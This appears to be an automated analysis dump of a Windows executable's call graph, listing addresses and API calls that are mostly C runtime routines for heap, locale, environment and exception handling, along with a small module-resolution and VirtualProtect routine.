4818->4821 4819->4817 4819->4818 4824 4030e5 __cinit 4819->4824 4822 401662 setSBUpLow 5 API calls 4820->4822 4821->4820 4822->4817 4830 405c66 RtlUnwind 4824->4830 4825 403124 __except_handler4 4826 40315b 4825->4826 4828 401662 setSBUpLow 5 API calls 4825->4828 4827 401662 setSBUpLow 5 API calls 4826->4827 4829 40316b @_EH4_CallFilterFunc@8 4827->4829 4828->4826 4831 405c7b 4830->4831 4831->4825 4832 404800 4833 40480c SetLastError 4832->4833 4834 404814 _raise 4832->4834 4833->4834 4009 404348 4010 404032 __calloc_crt 67 API calls 4009->4010 4011 404352 4010->4011 4012 401aaa __init_pointers 67 API calls 4011->4012 4013 40435a 4012->4013 4835 401b8f TlsAlloc 4836 406c10 4837 406c22 4836->4837 4839 406c30 4836->4839 4838 401662 setSBUpLow 5 API calls 4837->4838 4838->4839 4014 404753 RtlInitializeCriticalSection 4015 405bd4 4016 405be6 4015->4016 4018 405bf4 @_EH4_CallFilterFunc@8 4015->4018 4019 401662 4016->4019 4020 40166a 4019->4020 4021 40166c IsDebuggerPresent 4019->4021 4020->4018 4027 4040c5 4021->4027 4024 4020c5 SetUnhandledExceptionFilter UnhandledExceptionFilter 4025 4020e2 __invoke_watson 4024->4025 4026 4020ea GetCurrentProcess TerminateProcess 4024->4026 4025->4026 4026->4018 4027->4024 4028 401d55 4029 401d61 _raise 4028->4029 4030 401d79 4029->4030 4032 401e55 _raise 4029->4032 4033 403f64 ___free_lconv_mon 67 API calls 4029->4033 4031 401d87 4030->4031 4034 403f64 ___free_lconv_mon 67 API calls 4030->4034 4035 401d95 4031->4035 4036 403f64 ___free_lconv_mon 67 API calls 4031->4036 4033->4030 4034->4031 4037 401da3 4035->4037 4038 403f64 ___free_lconv_mon 67 API calls 4035->4038 4036->4035 4039 401db1 4037->4039 4041 403f64 ___free_lconv_mon 67 API calls 4037->4041 4038->4037 4040 401dbf 4039->4040 4042 403f64 ___free_lconv_mon 67 API calls 4039->4042 4043 403f64 ___free_lconv_mon 67 API calls 4040->4043 4045 401dd0 4040->4045 4041->4039 4042->4040 4043->4045 4044 4034ee __lock 67 API calls 4046 401dd8 4044->4046 4045->4044 4047 401de4 InterlockedDecrement 4046->4047 4048 401dfd 4046->4048 4047->4048 4050 401def 4047->4050 4062 401e61 4048->4062 4050->4048 4053 403f64 ___free_lconv_mon 67 API calls 4050->4053 4052 4034ee __lock 67 API calls 4054 401e11 4052->4054 4053->4048 4055 401e42 4054->4055 4065 4036e5 4054->4065 4109 401e6d 4055->4109 4059 403f64 ___free_lconv_mon 67 API calls 4059->4032 4112 403416 RtlLeaveCriticalSection 4062->4112 4064 401e0a 4064->4052 4066 401e26 4065->4066 4067 4036ee InterlockedDecrement 4065->4067 4066->4055 4079 40351f 4066->4079 4068 403704 InterlockedDecrement 4067->4068 4069 403707 4067->4069 4068->4069 4070 403711 InterlockedDecrement 4069->4070 4071 403714 4069->4071 4070->4071 4072 403721 4071->4072 4073 40371e InterlockedDecrement 4071->4073 4074 40372b InterlockedDecrement 4072->4074 4076 40372e 4072->4076 4073->4072 4074->4076 4075 403743 InterlockedDecrement 4075->4076 4076->4075 4077 403753 InterlockedDecrement 4076->4077 4078 40375c InterlockedDecrement 4076->4078 4077->4076 4078->4066 4080 4035a0 4079->4080 4083 403533 4079->4083 4081 403f64 ___free_lconv_mon 67 API calls 4080->4081 4082 4035ed 4080->4082 4084 4035c1 4081->4084 4092 403614 4082->4092 4137 405c97 4082->4137 4083->4080 4089 403f64 ___free_lconv_mon 67 API calls 4083->4089 4093 403567 4083->4093 4087 403f64 ___free_lconv_mon 67 API calls 4084->4087 4091 4035d4 4087->4091 4088 403f64 ___free_lconv_mon 67 API calls 4088->4092 4095 40355c 4089->4095 4090 403653 4096 403f64 ___free_lconv_mon 67 API calls 4090->4096 4097 403f64 ___free_lconv_mon 67 API calls 4091->4097 4092->4090 4104 403f64 67 API calls ___free_lconv_mon 4092->4104 4098 403f64 ___free_lconv_mon 67 API calls 4093->4098 4108 403588 4093->4108 4094 403f64 ___free_lconv_mon 67 API calls 4099 403595 4094->4099 4113 405e67 4095->4113 4101 403659 4096->4101 4102 4035e2 4097->4102 4103 40357d 4098->4103 4105 403f64 ___free_lconv_mon 67 API calls 4099->4105 4101->4055 4106 403f64 ___free_lconv_mon 67 API calls 4102->4106 4129 405e27 4103->4129 4104->4092 4105->4080 4106->4082 4108->4094 4225 403416 RtlLeaveCriticalSection 4109->4225 4111 401e4f 4111->4059 4112->4064 4114 405e70 4113->4114 4128 405eed 4113->4128 4115 403f64 ___free_lconv_mon 67 API calls 4114->4115 4116 405e81 4114->4116 4115->4116 4117 403f64 ___free_lconv_mon 67 API calls 4116->4117 4119 405e93 4116->4119 4117->4119 4118 405ea5 4121 405eb7 4118->4121 4123 403f64 ___free_lconv_mon 67 API calls 4118->4123 4119->4118 4120 403f64 ___free_lconv_mon 67 API calls 4119->4120 4120->4118 4122 405ec9 4121->4122 4124 403f64 ___free_lconv_mon 67 API calls 4121->4124 4125 405edb 4122->4125 4126 403f64 ___free_lconv_mon 67 API calls 4122->4126 4123->4121 4124->4122 4127 403f64 ___free_lconv_mon 67 API calls 4125->4127 4125->4128 4126->4125 4127->4128 4128->4093 4130 405e64 4129->4130 4132 405e30 4129->4132 4130->4108 4131 405e40 4133 405e52 4131->4133 4135 403f64 ___free_lconv_mon 67 API calls 4131->4135 4132->4131 4134 403f64 ___free_lconv_mon 67 API calls 4132->4134 4133->4130 4136 403f64 ___free_lconv_mon 67 API calls 4133->4136 4134->4131 4135->4133 4136->4130 4138 405ca4 4137->4138 4224 40360d 4137->4224 4139 403f64 ___free_lconv_mon 67 API calls 4138->4139 4140 405cac 4139->4140 4141 403f64 ___free_lconv_mon 67 API calls 4140->4141 4142 405cb4 4141->4142 4143 403f64 ___free_lconv_mon 67 API calls 4142->4143 4144 405cbc 4143->4144 4145 403f64 ___free_lconv_mon 67 API calls 4144->4145 4146 405cc4 4145->4146 4147 403f64 ___free_lconv_mon 67 API calls 4146->4147 4148 405ccc 4147->4148 4149 403f64 ___free_lconv_mon 67 API calls 4148->4149 4150 405cd4 4149->4150 4151 403f64 ___free_lconv_mon 67 API calls 4150->4151 4152 405cdb 4151->4152 4153 403f64 ___free_lconv_mon 67 API calls 4152->4153 4154 405ce3 4153->4154 4155 403f64 ___free_lconv_mon 67 API calls 4154->4155 4156 405ceb 4155->4156 4157 403f64 ___free_lconv_mon 67 API calls 4156->4157 4158 405cf3 4157->4158 4159 403f64 ___free_lconv_mon 67 API calls 4158->4159 4160 405cfb 4159->4160 4161 403f64 ___free_lconv_mon 67 API calls 4160->4161 4162 405d03 4161->4162 4163 403f64 ___free_lconv_mon 67 API calls 4162->4163 4164 405d0b 4163->4164 4165 403f64 ___free_lconv_mon 67 API calls 4164->4165 4166 405d13 4165->4166 4167 403f64 ___free_lconv_mon 67 API calls 4166->4167 4168 405d1b 4167->4168 4169 403f64 ___free_lconv_mon 67 API calls 4168->4169 4170 405d23 4169->4170 4171 403f64 ___free_lconv_mon 67 API calls 4170->4171 4172 405d2e 4171->4172 4173 403f64 ___free_lconv_mon 67 API calls 4172->4173 4174 405d36 4173->4174 4175 403f64 ___free_lconv_mon 67 API calls 4174->4175 4176 405d3e 4175->4176 4177 403f64 ___free_lconv_mon 67 API calls 4176->4177 4178 405d46 4177->4178 4179 403f64 ___free_lconv_mon 67 API calls 4178->4179 4180 405d4e 4179->4180 4181 403f64 ___free_lconv_mon 67 API calls 4180->4181 4182 405d56 4181->4182 4183 403f64 ___free_lconv_mon 67 API calls 4182->4183 4184 405d5e 4183->4184 4185 403f64 ___free_lconv_mon 67 API calls 4184->4185 4186 405d66 4185->4186 4187 403f64 ___free_lconv_mon 67 API calls 4186->4187 4188 405d6e 4187->4188 4189 403f64 ___free_lconv_mon 67 API calls 4188->4189 4190 405d76 4189->4190 4191 403f64 ___free_lconv_mon 67 API calls 4190->4191 4192 405d7e 4191->4192 4193 403f64 ___free_lconv_mon 67 API calls 4192->4193 4194 405d86 4193->4194 4195 403f64 ___free_lconv_mon 67 API calls 4194->4195 4196 405d8e 4195->4196 4197 403f64 ___free_lconv_mon 67 API calls 4196->4197 4198 405d96 4197->4198 4199 403f64 ___free_lconv_mon 67 API calls 4198->4199 4200 405d9e 4199->4200 4201 403f64 ___free_lconv_mon 67 API calls 4200->4201 4202 405da6 4201->4202 4203 403f64 ___free_lconv_mon 67 API calls 4202->4203 4204 405db4 4203->4204 4205 403f64 ___free_lconv_mon 67 API calls 4204->4205 4206 405dbf 4205->4206 4207 403f64 ___free_lconv_mon 67 API calls 4206->4207 4208 405dca 4207->4208 4209 403f64 ___free_lconv_mon 67 API calls 4208->4209 4210 405dd5 4209->4210 4211 403f64 ___free_lconv_mon 67 API calls 4210->4211 4212 405de0 4211->4212 4213 403f64 ___free_lconv_mon 67 API calls 4212->4213 4214 405deb 4213->4214 4215 403f64 ___free_lconv_mon 67 API calls 4214->4215 4216 405df6 4215->4216 4217 403f64 ___free_lconv_mon 67 API calls 4216->4217 4218 405e01 4217->4218 4219 403f64 ___free_lconv_mon 67 API calls 4218->4219 4220 405e0c 4219->4220 4221 403f64 ___free_lconv_mon 67 API calls 4220->4221 4222 405e17 4221->4222 4223 403f64 ___free_lconv_mon 67 API calls 4222->4223 4223->4224 4224->4088 4225->4111 3934 407a59 3935 407a70 3934->3935 3940 407ade 3934->3940 3935->3940 3947 407a98 GetModuleHandleA 3935->3947 3936 407b24 3960 407b29 3936->3960 3937 407ae7 GetModuleHandleA 3941 407af1 3937->3941 3940->3936 3940->3937 3940->3941 3941->3940 3942 407b11 GetProcAddress 3941->3942 3942->3940 3943 407a8f 3943->3940 3943->3941 3944 407ab2 GetProcAddress 3943->3944 3944->3940 3945 407abf VirtualProtect 3944->3945 3945->3940 3946 407ace VirtualProtect 3945->3946 3946->3940 3948 407aa1 3947->3948 3955 407ade 3947->3955 3968 407ab5 GetProcAddress 3948->3968 3950 407b24 3953 407b29 75 API calls 3950->3953 3951 407ae7 GetModuleHandleA 3958 407af1 3951->3958 3952 407aa6 3954 407ab2 GetProcAddress 3952->3954 3952->3955 3953->3950 3954->3955 3956 407abf VirtualProtect 3954->3956 3955->3950 3955->3951 3955->3958 3956->3955 3957 407ace VirtualProtect 3956->3957 3957->3955 3958->3955 3959 407b11 GetProcAddress 3958->3959 3959->3955 3961 4018b6 3960->3961 3985 403196 3961->3985 3963 4016d6 _raise 3964 4016e2 GetStartupInfoA GetProcessHeap RtlAllocateHeap 3963->3964 3965 401714 3964->3965 3977 401671 3965->3977 3967 40171b _raise 3967->3936 3969 407ade 3968->3969 3970 407abf VirtualProtect 3968->3970 3972 407b24 3969->3972 3973 407ae7 GetModuleHandleA 3969->3973 3970->3969 3971 407ace VirtualProtect 3970->3971 3971->3969 3974 407b29 75 API calls 3972->3974 3976 407af1 3973->3976 3974->3972 3975 407b11 GetProcAddress 3975->3976 3976->3969 3976->3975 3978 40167a 3977->3978 3979 40167f 3977->3979 3980 402605 __FF_MSGBANNER 67 API calls 3978->3980 3981 402465 _abort 67 API calls 3979->3981 3980->3979 3982 401688 3981->3982 3983 402193 _fast_error_exit 3 API calls 3982->3983 3984 401692 3983->3984 3984->3967 3986 4031c6 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3985->3986 3987 4031b9 3985->3987 3988 4031bd 3986->3988 3987->3986 3987->3988 3988->3963 4226 4023d9 4229 4022f7 4226->4229 4228 4023e6 4230 402303 _raise 4229->4230 4231 4034ee __lock 67 API calls 4230->4231 4232 40230a 4231->4232 4233 402379 _raise 4232->4233 4235 401b21 _raise 67 API calls 4232->4235 4249 4023c4 4233->4249 4237 402339 4235->4237 4239 401b21 _raise 67 API calls 4237->4239 4238 4023c1 _raise 4238->4228 4243 402347 4239->4243 4241 4023b8 4242 402193 _fast_error_exit 3 API calls 4241->4242 4242->4238 4243->4233 4245 401b21 _raise 67 API calls 4243->4245 4246 401b18 4243->4246 4245->4243 4247 401aaa __init_pointers 67 API calls 4246->4247 4248 401b1f 4247->4248 4248->4243 4250 4023a5 4249->4250 4251 4023ca 4249->4251 4250->4238 4253 403416 RtlLeaveCriticalSection 4250->4253 4254 403416 RtlLeaveCriticalSection 4251->4254 4253->4241 4254->4250 4255 402c5b 4270 402f98 4255->4270 4257 402c67 GetStartupInfoA 4258 404032 __calloc_crt 67 API calls 4257->4258 4264 402c88 4258->4264 4259 402e92 _raise 4260 402e0f GetStdHandle 4265 402dd9 4260->4265 4261 404032 __calloc_crt 67 API calls 4261->4264 4262 402e74 SetHandleCount 4262->4259 4263 402e21 GetFileType 4263->4265 4264->4259 4264->4261 4264->4265 4267 402d5c 4264->4267 4265->4259 4265->4260 4265->4262 4265->4263 4266 404763 ___crtInitCritSecAndSpinCount 67 API calls 4265->4266 4266->4265 4267->4259 4267->4265 4268 402d85 GetFileType 4267->4268 4269 404763 ___crtInitCritSecAndSpinCount 67 API calls 4267->4269 4268->4267 4269->4267 4270->4257 4840 40279d 4841 4027a9 4840->4841 4845 4027ae 4840->4845 4842 403f46 ___initmbctable 111 API calls 4841->4842 4842->4845 4843 4027ea 4844 404cc7 _parse_cmdline 77 API calls 4844->4845 4845->4843 4845->4844 4271 401863 4274 40263f 4271->4274 4275 401cc6 _raise 67 API calls 4274->4275 4276 401874 4275->4276 4277 402265 4278 40226e __cinit 4277->4278 4283 4043c5 4278->4283 4280 40228d __initterm_e 4282 4022ae __cinit 4280->4282 4287 4043b3 4280->4287 4284 4043c9 4283->4284 4285 401aaa __init_pointers 67 API calls 4284->4285 4286 4043e1 4284->4286 4285->4284 4286->4280 4290 404377 4287->4290 4289 4043bc 4289->4282 4291 404383 _raise 4290->4291 4298 4021a8 4291->4298 4297 4043a4 _raise 4297->4289 4299 4034ee __lock 67 API calls 4298->4299 4300 4021af 4299->4300 4301 40428f 4300->4301 4302 401b21 _raise 67 API calls 4301->4302 4303 40429f 4302->4303 4304 401b21 _raise 67 API calls 4303->4304 4305 4042b0 4304->4305 4312 404333 4305->4312 4321 406b43 4305->4321 4307 401aaa __init_pointers 67 API calls 4308 404328 4307->4308 4310 401aaa __init_pointers 67 API calls 4308->4310 4309 4042ce 4313 4042f0 4309->4313 4317 404319 4309->4317 4334 40407a 4309->4334 4310->4312 4318 4043ad 4312->4318 4313->4312 4314 40407a __realloc_crt 73 API calls 4313->4314 4315 404307 4313->4315 4314->4315 4315->4312 4316 401aaa __init_pointers 67 API calls 4315->4316 4316->4317 4317->4307 4383 4021b1 4318->4383 4322 406b4f _raise 4321->4322 4323 406b7c 4322->4323 4324 406b5f 4322->4324 4326 406bbd RtlSizeHeap 4323->4326 4328 4034ee __lock 67 API calls 4323->4328 4325 40427c _raise 67 API calls 4324->4325 4327 406b64 4325->4327 4330 406b74 _raise 4326->4330 4329 40421d _raise 67 API calls 4327->4329 4331 406b8c ___sbh_find_block 4328->4331 4329->4330 4330->4309 4339 406bdd 4331->4339 4337 40407e 4334->4337 4336 4040c0 4336->4313 4337->4336 4338 4040a1 Sleep 4337->4338 4343 406835 4337->4343 4338->4337 4342 403416 RtlLeaveCriticalSection 4339->4342 4341 406bb8 4341->4326 4341->4330 4342->4341 4344 406841 _raise 4343->4344 4345 406856 4344->4345 4346 406848 4344->4346 4348 406869 4345->4348 4349 40685d 4345->4349 4347 406654 _malloc 67 API calls 4346->4347 4370 406850 _raise _realloc 4347->4370 4355 4069db 4348->4355 4367 406876 _realloc ___sbh_resize_block ___sbh_find_block 4348->4367 4350 403f64 ___free_lconv_mon 67 API calls 4349->4350 4350->4370 4351 406a0e 4354 404832 _realloc 67 API calls 4351->4354 4352 4069e0 RtlReAllocateHeap 4352->4355 4352->4370 4353 4034ee __lock 67 API calls 4353->4367 4356 406a14 4354->4356 4355->4351 4355->4352 4357 406a32 4355->4357 4359 404832 _realloc 67 API calls 4355->4359 4362 406a28 4355->4362 4358 40427c _raise 67 API calls 4356->4358 4360 40427c _raise 67 API calls 4357->4360 4357->4370 4358->4370 4359->4355 4361 406a3b GetLastError 4360->4361 4361->4370 4364 40427c _raise 67 API calls 4362->4364 4377 4069a9 4364->4377 4365 406901 RtlAllocateHeap 4365->4367 4366 406956 RtlReAllocateHeap 4366->4367 4367->4351 4367->4353 4367->4365 4367->4366 4369 405861 ___sbh_alloc_block 5 API calls 4367->4369 4367->4370 4371 4069c1 4367->4371 4372 404832 _realloc 67 API calls 4367->4372 4375 4069a4 4367->4375 4378 4050b8 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 4367->4378 4379 406979 4367->4379 4368 4069ae GetLastError 4368->4370 4369->4367 4370->4337 4371->4370 4373 40427c _raise 67 API calls 4371->4373 4372->4367 4374 4069ce 4373->4374 4374->4361 4374->4370 4376 40427c _raise 67 API calls 4375->4376 4376->4377 4377->4368 4377->4370 4378->4367 4382 403416 RtlLeaveCriticalSection 4379->4382 4381 406980 4381->4367 4382->4381 4386 403416 RtlLeaveCriticalSection 4383->4386 4385 4021b8 4385->4297 4386->4385 4846 402b26 4847 402b42 GetEnvironmentStringsW 4846->4847 4848 402b61 4846->4848 4849 402b56 GetLastError 4847->4849 4850 402b4a 4847->4850 4848->4850 4851 402bfc 4848->4851 4849->4848 4852 402b8b WideCharToMultiByte 4850->4852 4853 402b7c GetEnvironmentStringsW 4850->4853 4854 402c04 GetEnvironmentStrings 4851->4854 4855 402b84 4851->4855 4858 402bf1 FreeEnvironmentStringsW 4852->4858 4859 402bbf 4852->4859 4853->4852 4853->4855 4854->4855 4856 402c14 4854->4856 4861 403ff2 __malloc_crt 67 API calls 4856->4861 4858->4855 4860 403ff2 __malloc_crt 67 API calls 4859->4860 4863 402bc5 4860->4863 4862 402c2d 4861->4862 4864 402c40 _realloc 4862->4864 4865 402c34 FreeEnvironmentStringsA 4862->4865 4863->4858 4866 402bce WideCharToMultiByte 4863->4866 4869 402c48 FreeEnvironmentStringsA 4864->4869 4865->4855 4867 402be8 4866->4867 4868 402bdf 4866->4868 4867->4858 4870 403f64 ___free_lconv_mon 67 API calls 4868->4870 4869->4855 4870->4867 4871 4210ae 4873 4210cd 4871->4873 4874 42115b 4873->4874 4876 421170 4874->4876 4877 4018b6 4876->4877 4878 403196 ___security_init_cookie 5 API calls 4877->4878 4879 4016d6 _raise 4878->4879 4880 4016e2 GetStartupInfoA GetProcessHeap RtlAllocateHeap 4879->4880 4881 401714 4880->4881 4882 401671 _fast_error_exit 67 API calls 4881->4882 4883 40171b _raise 4882->4883 4390 402a6d 4391 402a80 4390->4391 4392 402a85 GetModuleFileNameA 4390->4392 4401 403f46 4391->4401 4394 402aac 4392->4394 4405 4028d5 4394->4405 4396 402b08 4398 403ff2 __malloc_crt 67 API calls 4399 402aee 4398->4399 4399->4396 4400 4028d5 _parse_cmdline 77 API calls 4399->4400 4400->4396 4402 403f56 4401->4402 4403 403f4f 4401->4403 4402->4392 4411 403dac 4403->4411 4407 4028f2 4405->4407 4409 40295f 4407->4409 4663 404cc7 4407->4663 4408 402a5d 4408->4396 4408->4398 4409->4408 4410 404cc7 77 API calls _parse_cmdline 4409->4410 4410->4409 4412 403db8 _raise 4411->4412 4413 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4412->4413 4414 403dc1 4413->4414 4442 403a33 4414->4442 4416 403dcb 4458 403b59 4416->4458 4419 403ff2 __malloc_crt 67 API calls 4420 403dec 4419->4420 4421 403f0b _raise 4420->4421 4465 403bd3 4420->4465 4421->4402 4424 403f18 4424->4421 4429 403f64 ___free_lconv_mon 67 API calls 4424->4429 4433 403f2b 4424->4433 4425 403e1c InterlockedDecrement 4426 403e2c 4425->4426 4427 403e3d InterlockedIncrement 4425->4427 4426->4427 4431 403f64 ___free_lconv_mon 67 API calls 4426->4431 4427->4421 4428 403e53 4427->4428 4428->4421 4432 4034ee __lock 67 API calls 4428->4432 4429->4433 4430 40427c _raise 67 API calls 4430->4421 4434 403e3c 4431->4434 4436 403e67 InterlockedDecrement 4432->4436 4433->4430 4434->4427 4437 403ee3 4436->4437 4438 403ef6 InterlockedIncrement 4436->4438 4437->4438 4440 403f64 ___free_lconv_mon 67 API calls 4437->4440 4475 403f0d 4438->4475 4441 403ef5 4440->4441 4441->4438 4443 403a3f _raise 4442->4443 4444 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4443->4444 4445 403a44 4444->4445 4446 4034ee __lock 67 API calls 4445->4446 4447 403a56 4445->4447 4448 403a74 4446->4448 4450 403a64 _raise 4447->4450 4454 402149 __amsg_exit 67 API calls 4447->4454 4449 403abd 4448->4449 4451 403aa5 InterlockedIncrement 4448->4451 4452 403a8b InterlockedDecrement 4448->4452 4478 403ace 4449->4478 4450->4416 4451->4449 4452->4451 4455 403a96 4452->4455 4454->4450 4455->4451 4456 403f64 ___free_lconv_mon 67 API calls 4455->4456 4457 403aa4 4456->4457 4457->4451 4482 403ad7 4458->4482 4461 403b94 4463 403b99 GetACP 4461->4463 4464 403b86 4461->4464 4462 403b76 GetOEMCP 4462->4464 4463->4464 4464->4419 4464->4421 4466 403b59 getSystemCP 79 API calls 4465->4466 4467 403bf1 4466->4467 4468 403bfc setSBCS 4467->4468 4471 403c40 IsValidCodePage 4467->4471 4474 403c65 _memset __setmbcp 4467->4474 4469 401662 setSBUpLow 5 API calls 4468->4469 4470 403daa 4469->4470 4470->4424 4470->4425 4471->4468 4472 403c52 GetCPInfo 4471->4472 4472->4468 4472->4474 4517 4038a9 GetCPInfo 4474->4517 4662 403416 RtlLeaveCriticalSection 4475->4662 4477 403f14 4477->4421 4481 403416 RtlLeaveCriticalSection 4478->4481 4480 403ad5 4480->4447 4481->4480 4483 403ae6 4482->4483 4489 403b33 4482->4489 4484 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4483->4484 4485 403aeb 4484->4485 4486 403b13 4485->4486 4490 4037af 4485->4490 4488 403a33 _LocaleUpdate::_LocaleUpdate 69 API calls 4486->4488 4486->4489 4488->4489 4489->4461 4489->4462 4491 4037bb _raise 4490->4491 4492 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4491->4492 4493 4037c0 4492->4493 4494 4037ee 4493->4494 4496 4037d2 4493->4496 4495 4034ee __lock 67 API calls 4494->4495 4497 4037f5 4495->4497 4498 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4496->4498 4505 403771 4497->4505 4500 4037d7 4498->4500 4503 4037e5 _raise 4500->4503 4504 402149 __amsg_exit 67 API calls 4500->4504 4503->4486 4504->4503 4506 403775 4505->4506 4507 4037a7 4505->4507 4506->4507 4508 40365f ___addlocaleref 8 API calls 4506->4508 4513 403819 4507->4513 4509 403788 4508->4509 4509->4507 4510 4036e5 ___removelocaleref 8 API calls 4509->4510 4511 403793 4510->4511 4511->4507 4512 40351f ___freetlocinfo 67 API calls 4511->4512 4512->4507 4516 403416 RtlLeaveCriticalSection 4513->4516 4515 403820 4515->4500 4516->4515 4518 4038e0 _memset 4517->4518 4519 403989 4517->4519 4527 406192 4518->4527 4522 401662 setSBUpLow 5 API calls 4519->4522 4524 403a2b 4522->4524 4524->4474 4526 4065c2 ___crtLCMapStringA 102 API calls 4526->4519 4528 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4527->4528 4529 4061a3 4528->4529 4537 405fda 4529->4537 4532 4065c2 4533 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4532->4533 4534 4065d3 4533->4534 4615 406220 4534->4615 4538 406024 4537->4538 4539 405ff9 GetStringTypeW 4537->4539 4540 406011 4538->4540 4542 40610b 4538->4542 4539->4540 4541 406019 GetLastError 4539->4541 4543 40605d MultiByteToWideChar 4540->4543 4560 406105 4540->4560 4541->4538 4565 406e83 GetLocaleInfoA 4542->4565 4549 40608a 4543->4549 4543->4560 4545 401662 setSBUpLow 5 API calls 4547 403944 4545->4547 4547->4532 4548 40615c GetStringTypeA 4552 406177 4548->4552 4548->4560 4553 40609f _memset __alloca_probe_16 4549->4553 4554 406654 _malloc 67 API calls 4549->4554 4551 4060d8 MultiByteToWideChar 4556 4060ee GetStringTypeW 4551->4556 4557 4060ff 4551->4557 4558 403f64 ___free_lconv_mon 67 API calls 4552->4558 4553->4551 4553->4560 4554->4553 4556->4557 4561 405ef0 4557->4561 4558->4560 4560->4545 4562 405f09 4561->4562 4563 405ef8 4561->4563 4562->4560 4563->4562 4564 403f64 ___free_lconv_mon 67 API calls 4563->4564 4564->4562 4566 406eb4 4565->4566 4567 406eaf 4565->4567 4596 406e72 4566->4596 4569 401662 setSBUpLow 5 API calls 4567->4569 4570 40612f 4569->4570 4570->4548 4570->4560 4571 406eca 4570->4571 4572 406f08 GetCPInfo 4571->4572 4576 406f92 4571->4576 4573 406f7d MultiByteToWideChar 4572->4573 4574 406f1f 4572->4574 4573->4576 4578 406f38 _strlen 4573->4578 4574->4573 4577 406f25 GetCPInfo 4574->4577 4575 401662 setSBUpLow 5 API calls 4579 406150 4575->4579 4576->4575 4577->4573 4580 406f32 4577->4580 4581 406f6a _memset __alloca_probe_16 4578->4581 4582 406654 _malloc 67 API calls 4578->4582 4579->4548 4579->4560 4580->4573 4580->4578 4581->4576 4583 406fc7 MultiByteToWideChar 4581->4583 4582->4581 4584 406ffe 4583->4584 4585 406fdf 4583->4585 4586 405ef0 __freea 67 API calls 4584->4586 4587 407003 4585->4587 4588 406fe6 WideCharToMultiByte 4585->4588 4586->4576 4589 407022 4587->4589 4590 40700e WideCharToMultiByte 4587->4590 4588->4584 4591 404032 __calloc_crt 67 API calls 4589->4591 4590->4584 4590->4589 4592 40702a 4591->4592 4592->4584 4593 407033 WideCharToMultiByte 4592->4593 4593->4584 4594 407045 4593->4594 4595 403f64 ___free_lconv_mon 67 API calls 4594->4595 4595->4584 4599 407396 4596->4599 4600 4073ad 4599->4600 4603 40716b 4600->4603 4604 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4603->4604 4607 40717e 4604->4607 4605 407190 4606 40427c _raise 67 API calls 4605->4606 4608 407195 4606->4608 4607->4605 4611 4071cd 4607->4611 4609 40421d _raise 67 API calls 4608->4609 4614 406e7f 4609->4614 4610 40707c __isctype_l 91 API calls 4610->4611 4611->4610 4612 407212 4611->4612 4613 40427c _raise 67 API calls 4612->4613 4612->4614 4613->4614 4614->4567 4616 40623f LCMapStringW 4615->4616 4620 40625a 4615->4620 4617 406262 GetLastError 4616->4617 4616->4620 4617->4620 4618 406457 4622 406e83 ___ansicp 91 API calls 4618->4622 4619 4062b4 4621 4062cd MultiByteToWideChar 4619->4621 4644 40644e 4619->4644 4620->4618 4620->4619 4630 4062fa 4621->4630 4621->4644 4624 40647f 4622->4624 4623 401662 setSBUpLow 5 API calls 4625 403964 4623->4625 4626 406573 LCMapStringA 4624->4626 4627 406498 4624->4627 4624->4644 4625->4526 4661 4064cf 4626->4661 4628 406eca ___convertcp 74 API calls 4627->4628 4632 4064aa 4628->4632 4629 40634b MultiByteToWideChar 4633 406364 LCMapStringW 4629->4633 4655 406445 4629->4655 4631 406654 _malloc 67 API calls 4630->4631 4639 406313 __alloca_probe_16 4630->4639 4631->4639 4635 4064b4 LCMapStringA 4632->4635 4632->4644 4637 406385 4633->4637 4633->4655 4634 40659a 4641 403f64 ___free_lconv_mon 67 API calls 4634->4641 4634->4644 4647 4064d6 4635->4647 4635->4661 4636 405ef0 __freea 67 API calls 4636->4644 4640 40638d 4637->4640 4646 4063b6 4637->4646 4638 403f64 ___free_lconv_mon 67 API calls 4638->4634 4639->4629 4639->4644 4645 40639f LCMapStringW 4640->4645 4640->4655 4641->4644 4642 4064e7 _memset __alloca_probe_16 4654 406525 LCMapStringA 4642->4654 4642->4661 4643 4063d1 __alloca_probe_16 4648 406405 LCMapStringW 4643->4648 4643->4655 4644->4623 4645->4655 4646->4643 4649 406654 _malloc 67 API calls 4646->4649 4647->4642 4650 406654 _malloc 67 API calls 4647->4650 4651 40641d WideCharToMultiByte 4648->4651 4652 40643f 4648->4652 4649->4643 4650->4642 4651->4652 4653 405ef0 __freea 67 API calls 4652->4653 4653->4655 4656 406541 4654->4656 4657 406545 4654->4657 4655->4636 4660 405ef0 __freea 67 API calls 4656->4660 4659 406eca ___convertcp 74 API calls 4657->4659 4659->4656 4660->4661 4661->4634 4661->4638 4662->4477 4666 404c76 4663->4666 4667 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4666->4667 4668 404c87 4667->4668 4668->4407 4669 406bf0 RtlUnwind 4670 4040f1 4671 4040f4 4670->4671 4674 406a50 4671->4674 4675 406a75 4674->4675 4676 406a7c 4674->4676 4677 402465 _abort 67 API calls 4675->4677 4686 404578 4676->4686 4677->4676 4680 406a8d _memset 4682 406b3b 4680->4682 4685 406b10 SetUnhandledExceptionFilter UnhandledExceptionFilter 4680->4685 4710 4023ea 4682->4710 4685->4682 4687 401b21 _raise 67 API calls 4686->4687 4688 404583 4687->4688 4688->4680 4689 404585 4688->4689 4692 404591 _raise 4689->4692 4690 4045ed 4691 4045ce 4690->4691 4696 4045fc 4690->4696 4695 401b21 _raise 67 API calls 4691->4695 4692->4690 4692->4691 4693 4045b8 4692->4693 4699 4045b4 4692->4699 4694 401cc6 _raise 67 API calls 4693->4694 4697 4045bd _siglookup 4694->4697 4695->4697 4698 40427c _raise 67 API calls 4696->4698 4701 404663 4697->4701 4703 4023ea _raise 67 API calls 4697->4703 4704 4045c6 _raise 4697->4704 4700 404601 4698->4700 4699->4693 4699->4696 4702 40421d _raise 67 API calls 4700->4702 4705 4034ee __lock 67 API calls 4701->4705 4706 40466e 4701->4706 4702->4704 4703->4701 4704->4680 4705->4706 4707 401b18 _raise 67 API calls 4706->4707 4708 4046a3 